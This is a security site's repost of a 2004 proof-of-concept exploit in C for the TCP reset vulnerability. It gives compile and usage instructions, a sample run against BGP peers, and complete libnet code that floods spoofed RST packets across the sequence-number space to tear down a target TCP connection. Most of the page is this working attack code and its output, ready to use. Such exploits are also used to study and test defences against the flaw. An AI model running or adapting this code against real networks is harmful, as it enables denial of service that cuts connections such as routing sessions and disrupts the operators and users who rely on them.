首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TCP vulnerability proof of concept exploit
来源:vfocus.net 作者:Paul 发布时间:2004-04-26  

/*
By: Paul A. Watson
Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1

COMPILE:
gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!

EXECUTE:
reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]

EXAMPLE (and timing packets sent with /bin/date):
[root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
Tue Dec 16 21:18:28 CST 2003
Packets sent: 8192 Sequence guess: 536805376
Packets sent: 16384 Sequence guess: 1073676288
Packets sent: 24576 Sequence guess: 1610547200
Packets sent: 32768 Sequence guess: 2147418112
Packets sent: 40960 Sequence guess: 2684289024
Packets sent: 49152 Sequence guess: 3221159936
Packets sent: 57344 Sequence guess: 3758030848
packets sent: 65535
Tue Dec 16 21:18:46 CST 2003
[root@orc BGP]#
*/

#include <libnet.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
int c;
unsigned long int count=0;
unsigned long int count2=0;
unsigned long int seqguess=0;
unsigned long int seqstart=0;
unsigned long int seqincrement=0;
unsigned long int seqmax=4294967295;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
char * device = argv[1];
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];

char sourceip[32] = "";
char destinationip[32] = "";

/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
u_char enet_src[6] = {0x00, 0x60, 0x08, 0xa1, 0x31, 0xf2};
u_char enet_dst[6] = {0x00, 0x40, 0x2b, 0x4d, 0xf5, 0x23};
u_char org_code[3] = {0x00, 0x00, 0x00};

/* Its only test code, so minimal checking is performed... */
if (argc<7) {
printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [window size]\n",argv[0]);
printf("**Be sure to re-compile with appropriate MAC addresses!!! You were warned.\n");
exit(1);
}

strcpy(sourceip,argv[2]);
src_prt = atoi(argv[3]);
strcpy(destinationip,argv[4]);
dst_prt = atoi(argv[5]);
seqincrement= atoi(argv[6]);
seqstart= 0;
seqmax = 4294967295; /* 2^32 */

payload = NULL;
payload_s = 0;
src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);

for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
count++; count2++;
if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
l = libnet_init(LIBNET_LINK,device,errbuf);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);
t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
c = libnet_write(l);
}
printf("packets sent: %i\n",count);
return (EXIT_FAILURE);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·UMOD arbitrary file overwritin
·TCP Reset Tool v1.2
·TCP Connection Reset Remote Wi
·BGP denial of service exploit
·Microsoft windows lsass.exe lo
·Microsoft IIS 5.x SSL PCT Remo
·Windows schannel.dll PCT1 协议
·Win Lsasrv.dll RPC buffer over
·Windows Lsasrv.dll RPC Remote
·MS04011.cpp
·Windows LDT PoC Exploit by msl
·Microsoft Win Utility Manager
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved